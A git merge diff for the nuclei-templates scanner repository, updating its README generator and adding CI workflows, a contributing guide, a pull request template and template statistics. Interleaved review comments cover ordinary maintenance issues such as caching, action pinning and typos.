Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into pr/1241
commit
5767a0d5a2
|
@ -3,7 +3,7 @@ f"""
|
|||
<h1 align="center">
|
||||
Nuclei Templates
|
||||
</h1>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
|
@ -18,30 +18,27 @@ Nuclei Templates
|
|||
<a href="#-contributions">Contributions</a> •
|
||||
<a href="#-discussion">Discussion</a> •
|
||||
<a href="#-community">Community</a> •
|
||||
<a href="https://discord.gg/KECAGdH">Join Discord</a>
|
||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
||||
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
|
||||
</p>
|
||||
|
||||
----
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
|
||||
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
|
||||
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
|
||||
|
||||
|
||||
## Nuclei Templates overview
|
||||
|
||||
|
||||
An overview of the nuclei template directory including number of templates associated with each directory.
|
||||
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
|
||||
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
|
||||
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
|
||||
| default-logins | {countTpl("default-logins/*")} | exposed-tokens | {countTpl("exposed-tokens/*")} | dns | {countTpl("dns")} |
|
||||
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
|
||||
{get_top10()}
|
||||
|
||||
**{command("tree", -2, None)}**.
|
||||
|
||||
|
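Review bot: `{get_top10()}` is interpolated inside the `<table><tr><td>` cell kept as context in this hunk, so the `## Nuclei Templates Top 10 statistics` heading it returns is rendered inside an HTML table cell, and when `TOP-10.md` is absent the function returns an empty string while the new overview paragraph still promises "The table below". Consider moving the call outside the HTML wrapper (a single Markdown table no longer needs it) and making the overview sentence part of what `get_top10()` returns, so the text and the table appear or disappear together. In the same paragraph, "top ten statistics for each matrix" probably means "metric".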
@ -49,34 +46,34 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
|
||||
We have also added a set of templates to help you understand how things work.
|
||||
|
||||
💪 Contributions
|
||||
-----
|
||||
|
||||
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
Have questions / doubts / ideas to discuss?
|
||||
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
|
||||
👨💻 Community
|
||||
-----
|
||||
|
||||
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
|
||||
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
|
||||
💡 Notes
|
||||
-----
|
||||
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
|
||||
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||
"""
|
||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||
"""
|
||||
|
|
|
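Review bot: the Community section in this hunk still links `https://discord.gg/KECAGdH`, while the navigation bar in the previous hunk was switched to `https://discord.gg/projectdiscovery`; the reworded line should use the same invite so the README does not carry two different Discord links. The Notes bullet kept here, `Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate ...`, has an unclosed parenthesis and a plain-http link. Since this change set also adds a workflow that runs `nuclei -validate`, the bullet could mention that command as the local check.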
@ -8,6 +8,11 @@ def countTpl(path):
|
|||
def command(args, start=None, end=None):
|
||||
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
|
||||
|
||||
def get_top10():
|
||||
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
|
||||
TOP10 = command(["cat", "TOP-10.md"])
|
||||
return HEADER + TOP10 if len(TOP10) > 0 else ""
|
||||
|
||||
if __name__ == "__main__":
|
||||
version = command(["git", "describe", "--tags", "--abbrev=0"])
|
||||
template = eval(open(".github/scripts/README.tmpl", "r").read())
|
||||
|
|
|
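Review bot: `get_top10()` reads the file by spawning `cat TOP-10.md` through `command()`, which does not check the return code and always drops the final character with `[:-1]`, so a missing file silently produces an empty section and a file without a trailing newline loses its last character. Reading the file directly (`open("TOP-10.md").read().rstrip("\n")`) and handling `FileNotFoundError` explicitly would make both cases deliberate. Separately, the context line `template = eval(open(".github/scripts/README.tmpl", "r").read())` means everything in `README.tmpl` is executed as Python in the workflow, so edits to that template deserve the same scrutiny as edits to this script.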
@ -1,4 +1,4 @@
|
|||
name: syntax-checking
|
||||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout Repo
|
||||
uses: actions/checkout@master
|
||||
|
||||
- name: Setup golang
|
||||
uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.14
|
||||
|
||||
- name: Cache Go
|
||||
id: cache-go
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: /home/runner/go
|
||||
key: ${{ runner.os }}-go
|
||||
|
||||
- name: Installing Nuclei
|
||||
if: steps.cache-go.outputs.cache-hit != 'true'
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
nuclei -validate -t . -exclude .pre-commit-config.yaml
|
||||
shell: bash
|
|
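Review bot: the `Cache Go` step uses the constant key `${{ runner.os }}-go`, and `Installing Nuclei` is skipped whenever `cache-hit` is true, so after the first run the job keeps validating with whatever `nuclei@dev` build was cached and never picks up engine changes. Either pin nuclei to a release tag and put that version in the cache key, or add a component to the key that rotates (for example a date or the resolved commit). `actions/checkout@master` is a mutable branch reference in a workflow that runs on every `pull_request`; pinning it, and the other actions, to a release tag or a commit SHA keeps the job from changing underneath the repository. The `-exclude .pre-commit-config.yaml` argument suggests `-t .` picks up non-template YAML; pointing `-t` at the template directories would avoid maintaining an exclude list.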
@ -0,0 +1,63 @@
|
|||
name: 🗒 Templates Stats
|
||||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
|
||||
steps:
|
||||
- name: Checkout Repo
|
||||
uses: actions/checkout@master
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Setup golang
|
||||
uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.14
|
||||
|
||||
- name: Installing Template Stats
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/templates-stats
|
||||
shell: bash
|
||||
|
||||
- name: Markdown Stats
|
||||
run: |
|
||||
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||
shell: bash
|
||||
|
||||
- name: JSON Stats
|
||||
run: |
|
||||
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||
shell: bash
|
||||
|
||||
- name: Top 10 Stats
|
||||
run: |
|
||||
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||
shell: bash
|
||||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
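Review bot: the job condition `github.ref == 'refs/heads/master'` cannot be true for the `create` trigger on `v*` tags, because for that event `github.ref` is the tag ref that was created, so the job is skipped on every tag and only runs on a manual `workflow_dispatch` from `master`. If the intent is to regenerate the stats on release, check the tag in the condition and push to `master` explicitly instead of `branch: ${{ github.ref }}`. The `Push changes` step hands `secrets.GITHUB_TOKEN` to `ad-m/github-push-action@master`, a mutable third-party ref; pin it to a commit SHA or replace it with a plain `git push`. The three `templates-stats` steps hard-code `/home/runner/work/nuclei-templates/nuclei-templates/`; `$GITHUB_WORKSPACE` gives the same path without assuming the runner layout.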
@ -1,12 +1,10 @@
|
|||
name: "Auto Update README"
|
||||
name: 📝 Readme Update
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
|
|
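Review bot: with the trigger set to `create` on `v*` tags, this workflow and `Templates Stats` start from the same event with nothing ordering them, yet the README generator's `get_top10()` reads the `TOP-10.md` that the stats workflow writes. The README can therefore be rebuilt from a stale or missing `TOP-10.md`. Consider running the README update as a later step of the stats job, or triggering it with `workflow_run` after the stats workflow completes.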
@ -8,11 +8,9 @@
|
|||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
- "headless"
|
||||
- "dos"
|
||||
- "iot"
|
||||
- "misc"
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
|
@ -0,0 +1,100 @@
|
|||
# Template Contribution Guidelines
|
||||
|
||||
This documentation contains a set of guidelines to help you during the contribution process.
|
||||
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
|
||||
Thank you for helping out and remember, **no contribution is too small.**
|
||||
|
||||
# Submitting Nuclei Templates 👩💻👨💻
|
||||
|
||||
Below you will find the process and workflow used to review and merge your changes.
|
||||
|
||||
## Step 1 : Find existing templates
|
||||
|
||||
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
|
||||
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
|
||||
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
|
||||
|
||||
## Step 2 : Fork the Project
|
||||
|
||||
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
|
||||
|
||||
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
|
||||
|
||||
```sh
|
||||
git clone https://github.com/<your-username>/nuclei-templates
|
||||
cd nuclei-templates
|
||||
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
|
||||
```
|
||||
|
||||
- If you have already forked the project, update your copy before working.
|
||||
|
||||
```sh
|
||||
git remote update
|
||||
git checkout master
|
||||
git rebase upstream/master
|
||||
```
|
||||
|
||||
## Step 3 : Create your Template Branch
|
||||
|
||||
Create a new branch. Use its name to identify the issue your addressing.
|
||||
|
||||
```sh
|
||||
# It will create a new branch with name template_branch_name and switch to that branch
|
||||
git checkout -b template_branch_name
|
||||
```
|
||||
|
||||
## Step 4 : Create Template and Commit
|
||||
- Create your template.
|
||||
- Add all the files/folders needed.
|
||||
- After you've made changes or completed template creation, add changes to the branch you've just created by:
|
||||
|
||||
```sh
|
||||
# To add all new files to branch template_branch_name
|
||||
git add .
|
||||
```
|
||||
|
||||
- To commit give a descriptive message for the convenience of reveiwer by:
|
||||
|
||||
```sh
|
||||
# This message get associated with all files you have changed
|
||||
git commit -m "Added/Fixed/Updated XXX Template"
|
||||
```
|
||||
|
||||
**NOTE**:
|
||||
|
||||
- A Pull Request should have only one unique template to make it simple for review.
|
||||
- Multiple templates for same technology can be grouped into single Pull Request.
|
||||
|
||||
|
||||
## Step 5 : Push Your Changes
|
||||
|
||||
- Now you are ready to push your template to the remote (forked) repository.
|
||||
- When your work is ready and complies with the project conventions, upload your changes to your fork:
|
||||
|
||||
```sh
|
||||
# To push your work to your remote repository
|
||||
git push -u origin template_branch_name
|
||||
```
|
||||
|
||||
## Step 6 : Pull Request
|
||||
|
||||
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
|
||||
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
|
||||
|
||||
## Need more help?🤔
|
||||
|
||||
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
|
||||
|
||||
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
|
||||
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
|
||||
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
|
||||
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
|
||||
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
|
||||
|
||||
|
||||
## Tip from us😇
|
||||
|
||||
- **Nuclei** outcomes are only as excellent as **template matchers💡**
|
||||
- Declare at least two matchers to reduce false positive
|
||||
- Avoid matching words reflected in the URL to reduce false positive
|
||||
- Avoid short word that could be encountered anywhere
|
|
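Review bot: none of the six steps tells the contributor to validate the template before pushing, although the pull request template added in this change asks "I've validated this template locally?" and CI runs `nuclei -validate`; Step 4 should include that command so the checkbox has a defined meaning. In the same step, `git add .` stages everything in the working tree, and adding the specific template path is safer for a repository whose pull request template asks that vulnerable host information not be included. Smaller points: "the issue your addressing" should be "you're addressing", "reveiwer" should be "reviewer", the "Cloning a Repo" link points to a page about creating an issue or pull request, and the NOTE states both that a pull request should have only one template and that several may be grouped, which reads as a contradiction unless the second bullet is marked as the exception.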
@ -0,0 +1,28 @@
|
|||
### Template / PR Information
|
||||
|
||||
<!-- Explains the information and/or motivation for update or/ creating this templates -->
|
||||
<!-- Please include any reference to your template if available -->
|
||||
|
||||
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
|
||||
- References:
|
||||
|
||||
### Template Validation
|
||||
|
||||
I've validated this template locally?
|
||||
- [ ] YES
|
||||
- [ ] NO
|
||||
|
||||
|
||||
#### Additional Details (leave it blank if not applicable)
|
||||
|
||||
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
|
||||
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
|
||||
<!-- Please do NOT include vulnerable host information in pull requests -->
|
||||
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
|
||||
|
||||
### Additional References:
|
||||
|
||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
|
||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
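Review bot: the "Template Validation" section asks "I've validated this template locally?" without saying what validation means, so a ticked YES box carries little information for the reviewer. State the expected check next to the checkboxes, for example the same `nuclei -validate -t` invocation the new Template Validate workflow runs, and phrase the line as a statement rather than a question. The first HTML comment has a typo ("for update or/ creating this templates"), and the placeholder `CVE-2020-XXX` will age; `CVE-XXXX-XXXX` would avoid implying a year.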
52
README.md
|
@ -3,7 +3,7 @@
|
|||
<h1 align="center">
|
||||
Nuclei Templates
|
||||
</h1>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
|
@ -18,64 +18,74 @@ Nuclei Templates
|
|||
<a href="#-contributions">Contributions</a> •
|
||||
<a href="#-discussion">Discussion</a> •
|
||||
<a href="#-community">Community</a> •
|
||||
<a href="https://discord.gg/KECAGdH">Join Discord</a>
|
||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
||||
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
|
||||
</p>
|
||||
|
||||
----
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
|
||||
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
|
||||
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
|
||||
|
||||
|
||||
## Nuclei Templates overview
|
||||
|
||||
|
||||
An overview of the nuclei template directory including number of templates associated with each directory.
|
||||
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 |
|
||||
| takeovers | 67 | exposures | 66 | technologies | 60 |
|
||||
| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 |
|
||||
| default-logins | 21 | exposed-tokens | 9 | dns | 8 |
|
||||
| fuzzing | 7 | helpers | 6 | iot | 11 |
|
||||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
**82 directories, 892 files**.
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
|
||||
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
|
||||
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
|
||||
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
|
||||
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
|
||||
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
|
||||
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
|
||||
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
|
||||
|
||||
**139 directories, 1792 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
|
||||
We have also added a set of templates to help you understand how things work.
|
||||
|
||||
💪 Contributions
|
||||
-----
|
||||
|
||||
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
Have questions / doubts / ideas to discuss?
|
||||
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
|
||||
👨💻 Community
|
||||
-----
|
||||
|
||||
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
|
||||
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
|
||||
💡 Notes
|
||||
-----
|
||||
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
|
||||
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,684 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
|
||||
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
|
||||
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
|
||||
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
|
||||
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
|
||||
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
|
||||
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
|
||||
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
|
||||
| config | 90 | pussycat0x | 36 | miscellaneous | 27 | | | | |
|
||||
| cve2021 | 88 | ice3man | 26 | network | 27 | | | | |
|
||||
| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | |
|
||||
| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | |
|
||||
| cve2018 | 69 | philippedelteil | 16 | fuzzing | 10 | | | | |
|
||||
| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | |
|
||||
| token | 64 | milo2012 | 14 | headless | 5 | | | | |
|
||||
| apache | 62 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | |
|
||||
| default-login | 51 | techbrunchfr | 13 | | | | | | |
|
||||
| cve2017 | 45 | suman_kar | 12 | | | | | | |
|
||||
| file | 44 | cyllective | 11 | | | | | | |
|
||||
| iot | 44 | righettod | 10 | | | | | | |
|
||||
| unauth | 42 | random_robbie | 10 | | | | | | |
|
||||
| oob | 35 | hackergautam | 9 | | | | | | |
|
||||
| network | 35 | wdahlenb | 9 | | | | | | |
|
||||
| sqli | 34 | melbadry9 | 8 | | | | | | |
|
||||
| oracle | 29 | that_juan_ | 8 | | | | | | |
|
||||
| workflow | 29 | aashiq | 8 | | | | | | |
|
||||
| logs | 29 | iamthefrogy | 8 | | | | | | |
|
||||
| ssrf | 28 | r3dg33k | 8 | | | | | | |
|
||||
| cve2016 | 27 | nadino | 8 | | | | | | |
|
||||
| misc | 27 | harshbothra_ | 7 | | | | | | |
|
||||
| jira | 26 | 0x240x23elu | 7 | | | | | | |
|
||||
| atlassian | 26 | emadshanab | 7 | | | | | | |
|
||||
| disclosure | 25 | techryptic (@tech) | 7 | | | | | | |
|
||||
| listing | 24 | randomstr1ng | 7 | | | | | | |
|
||||
| redirect | 21 | dr_set | 7 | | | | | | |
|
||||
| aem | 19 | oppsec | 7 | | | | | | |
|
||||
| cisco | 18 | kophjager007 | 7 | | | | | | |
|
||||
| sap | 16 | __fazal | 6 | | | | | | |
|
||||
| cve2015 | 16 | caspergn | 6 | | | | | | |
|
||||
| debug | 14 | puzzlepeaches | 6 | | | | | | |
|
||||
| cve2012 | 14 | iamnoooob | 5 | | | | | | |
|
||||
| cve2014 | 13 | ganofins | 5 | | | | | | |
|
||||
| auth-bypass | 13 | panch0r3d | 5 | | | | | | |
|
||||
| struts | 13 | joanbono | 5 | | | | | | |
|
||||
| android | 13 | yanyun | 5 | | | | | | |
|
||||
| misconfig | 13 | pentest_swissky | 5 | | | | | | |
|
||||
| fuzz | 13 | rootxharsh | 5 | | | | | | |
|
||||
| adobe | 12 | xelkomy | 4 | | | | | | |
|
||||
| jenkins | 12 | elsfa7110 | 4 | | | | | | |
|
||||
| cve2011 | 12 | meme-lord | 4 | | | | | | |
|
||||
| dns | 12 | github.com/its0x08 | 4 | | | | | | |
|
||||
| weblogic | 12 | nodauf | 4 | | | | | | |
|
||||
| devops | 11 | e_schultze_ | 4 | | | | | | |
|
||||
| zoho | 11 | fyoorer | 3 | | | | | | |
|
||||
| dlink | 11 | shifacyclewala | 3 | | | | | | |
|
||||
| router | 11 | dudez | 3 | | | | | | |
|
||||
| springboot | 11 | f1tz | 3 | | | | | | |
|
||||
| cve2013 | 10 | mavericknerd | 3 | | | | | | |
|
||||
| php | 10 | thomas_from_offensity | 3 | | | | | | |
|
||||
| magento | 9 | vsh00t | 3 | | | | | | |
|
||||
